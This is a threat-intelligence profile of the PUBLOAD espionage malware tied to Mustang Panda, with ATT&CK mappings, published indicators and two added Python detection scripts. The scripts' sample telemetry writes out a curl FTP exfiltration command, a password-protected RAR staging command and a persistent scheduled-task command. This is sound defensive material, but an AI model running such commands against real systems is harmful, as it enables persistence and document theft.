PUBLOAD
PUBLOAD is a downloader/stager malware family associated with the China-linked threat actor Mustang Panda, also tracked as Stately Taurus, and described in some reporting as unique to that cluster. It has been observed since at least early 2022 in cyber-espionage campaigns against government entities in the Asia-Pacific region, including Southeast Asian governments and members of the Tibetan community. Typical delivery chains start with spear-phishing and execute the payload through DLL sideloading: observed lures included ZIP archives containing a legitimate executable such as Talking_Points_for_China.exe that sideloaded a malicious DLL such as KeyScramblerIE.dll, and a legitimate signed executable that loaded a PUBLOAD DLL such as BrMod104.dll. PUBLOAD has also been propagated via removable media by the HIUPAN/USBFect worm, which spreads it across endpoints through infected USB drives.
Functionally, PUBLOAD acts as a first-stage downloader/backdoor that contacts command-and-control infrastructure to retrieve additional shellcode-based payloads; it has been used to deliver PlugX as well as supplemental Mustang Panda tooling including FDMTP and PTSOCKET. Variants use either HTTP or TCP for C2. HTTP-based samples sent POST requests masquerading as Microsoft Windows Update traffic, with fake Windows Update-style URL paths such as /v11/2/windowsupdate/redir/v6-winsp1-wuredir and Host fields such as www.asia.microsoft.com; one sample connected directly to 123.253.32[.]15, and related infrastructure included www.fjke5oe[.]com and update.fjke5oe[.]com. TCP-based variants wrapped XOR-encrypted host data in obfuscated, fake TLS-like headers. Reported host reconnaissance includes enumerating running processes with tasklist, collecting system information such as volume details, computer names, usernames, and system tick counts, and checking connectivity with commands including tracert -h 5 -4 google.com and curl http://myip.ipip.net.
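The Windows Update masquerade described above is detectable because the Host header and the actual destination disagree. The following Python is an added example, not code from the cited reporting or from any vendor tool: it triages constructed proxy-log lines, matches the published network indicators, and flags requests that present a Microsoft Host header while connecting to an address that hostname never resolved to, or that POST to a Windows Update redirector path (the genuine client downloads redirector files with GET). The key=value log format, the `resolved` mapping standing in for passive DNS, and the addresses 192.0.2.10, 198.51.100.7 and 203.0.113.9 are constructed for the example.

```python
"""Hunt for PUBLOAD-style HTTP C2 that masquerades as Windows Update traffic.

Added example, not part of the cited reporting. The log format and the `resolved`
mapping are constructed stand-ins for a proxy log and a passive-DNS lookup."""
import re
from dataclasses import dataclass, field

# Network indicators taken from the public reporting summarised above.
KNOWN_C2_IPS = {"123.253.32.15"}
KNOWN_C2_DOMAINS = {"www.fjke5oe.com", "update.fjke5oe.com", "www.openservername.com"}
# Host values PUBLOAD spoofs; a real Windows Update client only sends these to Microsoft.
MS_HOST_RE = re.compile(r"(^|\.)(microsoft|windowsupdate)\.com$", re.IGNORECASE)
WU_REDIR_RE = re.compile(r"/windowsupdate/redir/", re.IGNORECASE)
# Constructed log format: space-separated key=value pairs, values optionally quoted.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Verdict:
    src: str
    dst: str
    host: str
    uri: str
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Turn one key=value log line into a dict (surrounding quotes stripped)."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def triage(lines, resolved):
    """Return a Verdict for every line that trips at least one check.

    resolved maps a hostname to the set of IPs it was actually observed resolving to.
    PUBLOAD connected straight to an IP while presenting a Microsoft Host header,
    so the header and the destination disagree."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        v = Verdict(rec.get("src", ""), rec.get("dst", ""),
                    rec.get("host", "").lower(), rec.get("uri", ""))
        if v.dst in KNOWN_C2_IPS:
            v.reasons.append("destination is a published PUBLOAD C2 IP")
        if v.host in KNOWN_C2_DOMAINS:
            v.reasons.append("Host header is a published PUBLOAD C2 domain")
        if MS_HOST_RE.search(v.host):
            if v.dst not in resolved.get(v.host, set()):
                v.reasons.append("Microsoft Host header, but destination never resolved from it")
            if rec.get("method", "").upper() == "POST" and WU_REDIR_RE.search(v.uri):
                v.reasons.append("POST to a Windows Update redirector path (the client fetches it with GET)")
        if v.reasons:
            hits.append(v)
    return hits


# Constructed sample telemetry: 192.0.2.10 stands in for a genuine Microsoft address,
# 198.51.100.7 for attacker infrastructure; the second line mirrors the published pattern.
SAMPLE_LOG = [
    'src=10.0.8.21 dst=192.0.2.10 method=GET host=www.update.microsoft.com uri=/v11/2/windowsupdate/redir/v6-winsp1-wuredir.cab',
    'src=10.0.8.44 dst=123.253.32.15 method=POST host=www.asia.microsoft.com uri=/v11/2/windowsupdate/redir/v6-winsp1-wuredir',
    'src=10.0.8.44 dst=198.51.100.7 method=POST host=update.fjke5oe.com uri=/',
    'src=10.0.8.60 dst=203.0.113.9 method=GET host=www.example.org uri=/index.html',
]
RESOLVED = {"www.update.microsoft.com": {"192.0.2.10"}}

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG, RESOLVED):
        print(f"{hit.src} -> {hit.dst} Host={hit.host}")
        for reason in hit.reasons:
            print("   ", reason)
```

The indicator match is the weakest part of this check, since the reported IP and domains will rotate; the Host-versus-destination mismatch and the POST to a redirector path survive infrastructure changes and are worth keeping as standing detections, fed by your own resolver or passive-DNS data rather than the constructed mapping used here.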
Additional observed behavior includes persistence via scheduled tasks, including creation of a task named Microsoft_Licensing using schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 ..., and reliance on legitimately signed host executables for sideloading, so that the process carrying the malicious DLL presents a valid certificate. Some reporting states PUBLOAD can harvest document files with extensions including .doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx, compress the targeted files into RAR archives, and exfiltrate them with curl to an attacker-controlled FTP site. Indicators and artifacts named in the cited reporting include BrMod104.dll (SHA256: 2a00d95b658e11ca71a8de532999dd33ddee7f80432653427eaa885b611ddd87), the malicious DLL KeyScramblerIE.dll, the scheduled task name Microsoft_Licensing, the IP 123.253.32[.]15, and the domains www.fjke5oe[.]com, update.fjke5oe[.]com, and www.openservername.com.
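The persistence and exfiltration tradecraft in this paragraph leaves process-creation command lines that are easy to triage. The Python below is an added example, not code from the cited reporting: it tokenises Windows command lines and flags a schtasks task that re-runs every few minutes under a Microsoft-themed name from a user-writable path, a RAR command staging the listed document types, and a curl upload to an FTP site. The task action path, archive name, password, and FTP address in the sample telemetry are constructed (the reporting elides the real /TR target), and the sample lines stand in for Sysmon Event ID 1 or Security 4688 CommandLine fields.

```python
"""Triage Windows process command lines for PUBLOAD persistence and exfiltration behaviour.

Added example, not part of the cited reporting. Sample command lines below are
constructed; only the Microsoft_Licensing task name and the /sc minute /MO 1
schedule come from the public description."""
import os
import re
import shlex

DOC_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".ppt", ".pptx"}
USER_WRITABLE_RE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\Public)\\", re.IGNORECASE)


def tokenize(cmdline):
    """Split on whitespace, honouring double quotes but leaving backslashes alone
    (posix=False), then drop the quotes that shlex keeps around quoted tokens."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def _image(tokens):
    return os.path.basename(tokens[0].replace("\\", "/")).lower()


def _arg_after(tokens, flag, case_insensitive=True):
    """Value following a flag such as /TN; schtasks flags are case-insensitive, curl's are not."""
    for i, tok in enumerate(tokens[:-1]):
        same = tok.lower() == flag.lower() if case_insensitive else tok == flag
        if same:
            return tokens[i + 1]
    return None


def check_schtasks(tokens):
    reasons = []
    if _image(tokens) not in ("schtasks", "schtasks.exe"):
        return reasons
    if not any(t.lower() == "/create" for t in tokens):
        return reasons
    name = _arg_after(tokens, "/TN") or ""
    sched = (_arg_after(tokens, "/SC") or "").lower()
    modifier = _arg_after(tokens, "/MO") or ""
    action = _arg_after(tokens, "/TR") or ""
    if sched == "minute" and modifier.isdigit() and int(modifier) <= 5:
        reasons.append(f"task {name!r} re-runs every {modifier} minute(s)")
    if USER_WRITABLE_RE.search(action):
        reasons.append(f"task action {action!r} lives in a user-writable directory")
    # A vendor-looking name on its own is common; it only matters alongside another signal.
    if reasons and re.fullmatch(r"microsoft[_ ]?\w*", name, re.IGNORECASE):
        reasons.append(f"task name {name!r} imitates a Microsoft component")
    return reasons


def check_rar(tokens):
    reasons = []
    if _image(tokens) not in ("rar", "rar.exe", "winrar", "winrar.exe"):
        return reasons
    if len(tokens) < 2 or tokens[1].lower() != "a":  # 'a' = add files to archive
        return reasons
    staged = sorted({os.path.splitext(t)[1].lower() for t in tokens[2:]} & DOC_EXTS)
    if staged:
        reasons.append(f"RAR archive stages document types {staged}")
    if any(t.lower().startswith(("-hp", "-p")) for t in tokens[2:]):
        reasons.append("archive is password-protected, hiding its contents from inspection")
    return reasons


def check_curl(tokens):
    reasons = []
    if _image(tokens) not in ("curl", "curl.exe"):
        return reasons
    upload = (_arg_after(tokens, "-T", case_insensitive=False)
              or _arg_after(tokens, "--upload-file", case_insensitive=False))
    target = next((t for t in tokens if t.lower().startswith("ftp://")), None)
    if upload and target:
        reasons.append(f"curl uploads {upload!r} to FTP site {target!r}")
        if upload.lower().endswith(".rar"):
            reasons.append("uploaded file is a RAR archive")
    return reasons


def triage(cmdlines):
    """Return (command line, reasons) for every line that trips at least one check."""
    hits = []
    for cmd in cmdlines:
        tokens = tokenize(cmd)
        if not tokens:
            continue
        reasons = check_schtasks(tokens) + check_rar(tokens) + check_curl(tokens)
        if reasons:
            hits.append((cmd, reasons))
    return hits


# Constructed sample telemetry; paths, archive name, password and FTP host are made up.
SAMPLE_CMDLINES = [
    r'schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 /TR "C:\Users\Public\Libraries\svchost.exe"',
    r'schtasks.exe /Create /TN "\Microsoft\Windows\Defrag\ScheduledDefrag" /sc weekly /TR "%windir%\system32\defrag.exe -c"',
    r'rar.exe a -r -hpSecret1 C:\Users\Public\o.rar C:\Users\alice\Documents\*.docx C:\Users\alice\Documents\*.pdf',
    r'curl -u user:pass -T C:\Users\Public\o.rar ftp://198.51.100.7/upload/',
    r'curl https://example.com/healthz',
]

if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_CMDLINES):
        print(cmd)
        for reason in reasons:
            print("   ", reason)
```

The second schtasks line is a benign Microsoft task and is deliberately not flagged: a name under the \Microsoft\ folder with a weekly schedule and a %windir% action trips none of the checks, which is why the name heuristic is only applied once another signal is present.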
Groups observed using it
Two distinct threat actors attributed by public researchers.
The earlier Stately Taurus attacks delivered the PubLoad malware and used the DLL sideloading technique to execute the malware... This malicious payload is a variant of PubLoad, which is stager malware that communicates with its command and control (C2) server to obtain a second shellcode-based payload.
UNK_SteadySplit is a user of the custom TONESHELL and PUBLOAD malware families, alongside multiple other first-stage malware families delivered in phishing campaigns.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
Mustang Panda notably utilized the USBFect worm to propagate PUBLOAD via infected USB drives, enabling lateral movement and data exfiltration.
Mustang Panda, also called Camaro Dragon, Earth Preta, and Stately Taurus, is believed to have targeted entities in Myanmar, the Philippines, Japan and Singapore, targeting them with phishing emails designed to deliver two malware packages.
Execution
7 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
facilitate two active reverse shells in parallel... Yokai, a backdoor that sets up a reverse shell to execute arbitrary commands.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
"BOOKWORM ... execution on the heap is initiated through callback function of legitimate API functions such as EnumChildWindows or EnumSystemLanguageGroupsA"; "CLAIMLOADER ... run its shellcode through the callback function"; "PUBLOAD stager leveraged Windows API functions with callback ... to bypass anti-virus monitoring"
"...a malicious archive with a document-spoofing executable, which launches the Claimloader DLL..."
This sophisticated malware utilizes Dynamic Link Library (DLL) sideloading techniques to execute malicious payloads... In a notable instance, the malware exploited a legitimate executable signed by an automation organization to load a malicious payload identified as BrMod104.dll.
Persistence
3 techniques
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Privilege Escalation
3 techniques
Stealth
6 techniques
The content repeatedly describes malware and threat actors using obfuscated code, encrypted strings, Base64/XOR/RC4/AES encoding, VMProtect/ConfuserEx/SmartAssembly, stack strings, control-flow flattening, opaque predicates, and hidden payloads to evade analysis and detection.
The HTTP request includes www.asia.microsoft.com within the host field as an attempt to masquerade as a legitimate request associated with the Windows operating system. Also, the URL pattern seen in these HTTP requests appears to be an attempt to mimic legitimate URLs accessed by Windows update.
Akira has used legitimate names and locations for files to evade defenses.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
The malware copies its components to a working directory... These components include: a legitimate parent process; ClaimLoader itself
Defense Impairment
1 technique
The content repeatedly describes threat actors and malware using valid, stolen, forged, self-signed, or abused code-signing certificates to sign malware and appear legitimate, including examples such as AppleJeus using a valid digital signature from Sectigo, APT41 leveraging code-signing certificates, FIN7 signing Carbanak payloads, and SUNBURST being digitally signed by SolarWinds.
Discovery
4 techniques
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."
Multiple malware families (e.g., Avaddon, Bazar, Clop, Ryuk, REvil, LockBit, Zeus Panda) check OS language/keyboard layout/locale and terminate or alter execution if the system matches excluded languages (commonly Russian/CIS) or does not match desired target languages (e.g., Spanish/Portuguese, Arabic, Persian).
Lateral Movement
2 techniques
Collection
2 techniques
PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx) ... PlugX then takes care of deploying another bespoke file collector called FILESAC that can collect the victim's files.
Command and Control
3 techniques
Variants of PUBLOAD use either HTTP or TCP for command-and-control (C2) communications. The sample we observed is a variant that uses TCP... Masol RAT... communicates with its C2 servers over HTTP POST... This malware uses Google Remote Procedure Call (gRPC) for C2 communication.
This particular PubLoad payload communicates with its C2 server by directly connecting to the IP address 123.253.32[.]15. The payload then issues an HTTP request... The HTTP request includes www.asia.microsoft.com within the host field as an attempt to masquerade as a legitimate request associated with the Windows operating system.
Exfiltration
2 techniques
PUBLOAD collected and exfiltrated critical system information... over TCP with obfuscated TLS-like headers
The captured information is compressed into a RAR archive and exfiltrated to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been observed deploying a custom program named PTSOCKET that can transfer files in multi-thread mode.
IOCs tracked for this family
13 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering network infrastructure (IPs, domains, and DNS) and file hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
41 sources tracked across advisories, community write-ups, and news.
Referenced as part of Mustang Panda's evolving malware/tooling ecosystem.
A named malware/tool repeatedly deployed by the Mustang Panda cluster in recent attacks.
Malware used in the campaign and propagated by USBFect via infected USB drives to support lateral movement and data exfiltration.
Malware used by Stately Taurus/Mustang Panda, propagated via infected USB drives. It collected and exfiltrated system information over TCP using obfuscated TLS-like headers and supported persistent access.